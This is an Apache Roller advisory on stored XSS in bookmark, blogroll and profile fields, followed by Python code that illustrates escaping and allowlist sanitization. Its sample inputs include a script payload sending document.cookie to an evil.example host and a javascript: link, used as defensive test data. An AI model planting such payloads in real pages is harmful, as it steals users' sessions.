The Apache Roller project would like to announce a vulnerability that may impact Roller installations that allow group blogging with untrusted users.
Severity: Medium (only impacts group blogging sites with untrusted users)

Description: Insufficient input validation and sanitization in the Bookmark, Bookmark Folder (Blogroll), and User Profile features in all versions of Apache Roller on all platforms allows an authenticated user to perform an XSS attack.

Mitigation: If you are not running a group blog, then no mitigation is needed. If you are running a group blog and you do not have Roller configured for untrusted users, then you need to do nothing, because you trust your users to author raw HTML and other web content. But if you are running a group blog and you do not trust your users to author HTML, CSS and JavaScript, then you should upgrade to Roller 6.1.3.

Roller 6.1.3 is available for download here: https://roller.apache.org/downloads/downloads.html

Apache Roller would like to thank Jacob Hazak for reporting this vulnerability.
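The flaw described above is stored XSS: a field that one authenticated member writes (a bookmark name or URL, a profile field) is later rendered into pages that other members and readers view. The following Python example is added here for illustration and is not Roller's code; it models a blogroll entry with constructed sample inputs and contrasts rendering raw stored HTML (acceptable only where every author is trusted, as the mitigation text says) with output encoding, a URL scheme allowlist and a small markup allowlist for the untrusted case. All names in it (SAMPLE_BOOKMARKS, safe_url, render_raw, AllowlistSanitizer, render_untrusted, render_blogroll) are assumptions for this example, not Roller identifiers.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample blogroll entries (not taken from the advisory): the kind of
# input an untrusted group-blog member might submit as a bookmark name and URL.
SAMPLE_BOOKMARKS = [
    {"name": "Apache Roller", "url": "https://roller.apache.org/"},
    {"name": '<script>location="https://evil.example/?c="+document.cookie</script>',
     "url": "https://example.com/"},
    {"name": "Click me", "url": "javascript:alert(document.domain)"},
]

def safe_url(url):
    """Allow only absolute http(s) URLs; reject control characters that browsers
    strip (e.g. 'java\\tscript:') and anything urlsplit cannot parse."""
    url = url.strip()
    if any(ord(c) <= 0x20 or ord(c) == 0x7F for c in url):
        return False
    try:
        return urlsplit(url).scheme in ("http", "https")
    except ValueError:
        return False

def render_raw(bm):
    """Stored values concatenated into the page unescaped. Acceptable only when
    every author is trusted to write raw HTML; with untrusted authors this is
    the stored XSS the advisory describes."""
    return f'<li><a href="{bm["url"]}">{bm["name"]}</a></li>'

class AllowlistSanitizer(HTMLParser):
    """Keep an allowlist of tags/attributes and drop everything else, including
    script/style bodies and on* handlers. Teaching-sized: production code should
    use a maintained sanitizer library that takes the same allowlist approach."""
    ALLOWED = {"a": {"href", "title"}, "b": set(), "i": set(),
               "em": set(), "strong": set()}

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []   # allowed tags still open; closed at the end
        self.skip_depth = 0   # > 0 inside <script>/<style>, whose text is dropped

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in self.ALLOWED:
            return
        kept = []
        for name, value in attrs:
            if name not in self.ALLOWED[tag] or value is None:
                continue          # drops onmouseover=, style=, ...
            if name == "href" and not safe_url(value):
                continue          # drops javascript: and data: links
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip_depth = max(0, self.skip_depth - 1)
        elif not self.skip_depth and tag in self.open_tags:
            while self.open_tags:          # close down to the matching tag
                closed = self.open_tags.pop()
                self.out.append(f"</{closed}>")
                if closed == tag:
                    break

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(html.escape(data, quote=True))

    def result(self):
        self.close()                       # flush buffered text
        while self.open_tags:              # close anything left open
            self.out.append(f"</{self.open_tags.pop()}>")
        return "".join(self.out)

def sanitize_html(fragment):
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    return parser.result()

def render_untrusted(bm, allow_formatting=False):
    """Output encoding for the text node and the href attribute, a URL scheme
    allowlist, and optionally a markup allowlist instead of plain escaping."""
    href = bm["url"].strip() if safe_url(bm["url"]) else "#"
    name = sanitize_html(bm["name"]) if allow_formatting else html.escape(bm["name"], quote=True)
    return f'<li><a href="{html.escape(href, quote=True)}">{name}</a></li>'

def render_blogroll(bookmarks, untrusted_users, allow_formatting=False):
    """The advisory's two configurations: trusted authors keep raw HTML,
    untrusted authors get escaped or allowlist-sanitized output."""
    if untrusted_users:
        items = (render_untrusted(bm, allow_formatting) for bm in bookmarks)
    else:
        items = (render_raw(bm) for bm in bookmarks)
    return "<ul>" + "".join(items) + "</ul>"
```

The first line of defence is contextual output encoding at render time (html.escape for the text node and for the attribute value); a scheme allowlist on href is needed separately because escaping does nothing against javascript: URLs. Allowlist sanitization of stored markup is the second layer, and it is the layer that lets a group blog offer limited formatting to untrusted members without handing them script execution.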